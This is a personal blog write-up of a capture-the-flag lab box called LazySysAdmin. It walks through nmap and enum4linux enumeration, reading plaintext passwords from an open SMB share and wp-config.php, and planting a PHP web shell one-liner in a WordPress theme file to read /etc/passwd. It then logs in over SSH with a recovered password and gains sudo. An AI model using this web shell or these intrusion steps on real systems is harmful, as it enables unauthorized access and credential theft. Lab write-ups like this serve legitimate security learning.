WWRDPLDN

This shall be a record of my escapades into the world of ones and zeros.

LazySysAdmin

wwrdpldnadmin | 13 October, 2017 17:59

 

I really liked the idea of this box. Having taken the OSCP and failed it just like the creator, (a kindred spirit), really appealed to me.

Netdiscover shows the IP address of the target

netdiscover -r 192.168.203.0

IP address of system 192.168.203.133

First I run an nmap on the IP

Starting Nmap 7.31 ( https://nmap.org ) at 2017-10-12 15:54 EDT

Nmap scan report for 192.168.203.133

Host is up (0.00027s latency).

Not shown: 994 closed ports

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

139/tcp open netbios-ssn

445/tcp open microsoft-ds

3306/tcp open mysql

6667/tcp open irc

MAC Address: 00:0C:29:B8:C0:55 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.78 seconds

Standard stuff, lets enumerate. I have alot more experience poking at SMB on windows boxes. Lets try it on linux. (the below response has been abridged)

root@kali-rolling:~/vulnhub/lazysysadmin# enum4linux 192.168.203.133

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Oct 12 15:55:27 2017

==========================

| Target Information |

==========================

Target ........... 192.168.203.133

RID Range ........ 500-550,1000-1050

Username ......... ''

Password ......... ''

Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=======================================================

| Enumerating Workgroup/Domain on 192.168.203.133 |

=======================================================

[+] Got domain/workgroup name: WORKGROUP

========================================

| Session Check on 192.168.203.133 |

========================================

[+] Server 192.168.203.133 allows sessions using username '', password ''

=========================================

| OS information on 192.168.203.133 |

=========================================

[+] Got OS info for 192.168.203.133 from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

[+] Got OS info for 192.168.203.133 from srvinfo:

LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server

platform_id : 500

os version : 6.1

server type : 0x809a03

============================================

| Share Enumeration on 192.168.203.133 |

============================================

WARNING: The "syslog" option is deprecated

Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Sharename Type Comment

--------- ---- -------

print$ Disk Printer Drivers

share$ Disk Sumshare

IPC$ IPC IPC Service (Web server)

Server Comment

--------- -------

LAZYSYSADMIN Web server

Workgroup Master

--------- -------

COUNTY IT-22331

WORKGROUP LAZYSYSADMIN

[+] Attempting to map shares on 192.168.203.133

//192.168.203.133/print$ Mapping: DENIED, Listing: N/A

//192.168.203.133/share$ Mapping: OK, Listing: OK

//192.168.203.133/IPC$ Mapping: OK Listing: DENIED

==========================================================================

| Users on 192.168.203.133 via RID cycling (RIDS: 500-550,1000-1050) |

==========================================================================

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\togie (Local User)

================================================

| Getting printer info for 192.168.203.133 |

================================================

No printers returned.

enum4linux complete on Thu Oct 12 15:55:43 2017

Well, I found an open share and a username, good stuff.

I mounted the share$ folder and explored. It looks like I'm sitting in the webroot folder. I first try to see if I can write to this folder but I am denied.

found following folders in the webroot folder:

apache

Backnode_files

old

test

wordpress

wp

found following files in the webroot folder:

deets.txt

index.html

info.php

robots.txt

todolist.txt

I Downloaded the contents to my working folder and started reading.

found in deets.txt

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

contents of robots.txt

User-agent: *

Disallow: /old/

Disallow: /test/

Disallow: /TR2/

Disallow: /Backnode_files/

carved from wordpress wp-config.php

define('DB_NAME', 'wordpress');

/** MySQL database username */

define('DB_USER', 'Admin');

/** MySQL database password */

define('DB_PASSWORD', 'TogieMYSQL12345^^');

This user/password in the wp-config is also the wordpress admin login to http://192.168.203.133/wordpress/wp-admin/

I know wordpress pretty well. It's easy to exploit to gain system access if you have admin rights.

I modified theme 404.php with a php com one-liner:

<?php

system($_GET["com"]);

?>

and went to:

http://192.168.203.133/wordpress/wp-content/twentyfifteen/404.php?=com=ls

alt

I do a cat /etc/passwd and there's that user(togie) again. I have access but I take a second to poke at ssh with the user/pass info I've recovered so far.

ssh togie@192.168.203.133 password 12345

I had found the user in enum4linux and verified using cat /etc/passwd from the com one-liner. The password was in deets.txt from mounting share$.

alt

Togie did not have rights to use cd but ls and cat worked just fine. More surprisingly, togie has sudo rights,...

alt

And now the flag,

alt

Not sure what these random strings are all about yet. I'll get back to you if I figure it out. The lesson to learn here is that I found everything I needed to just walk in(log in) using enumeration. I didn't have to actually use any outside exploits, I just exploited the poor config. Bravo Togie!

«Previous   1 2 3 4 5
 
Accessible and Valid XHTML 1.0 Strict and CSS
Powered by LifeType - Design by BalearWeb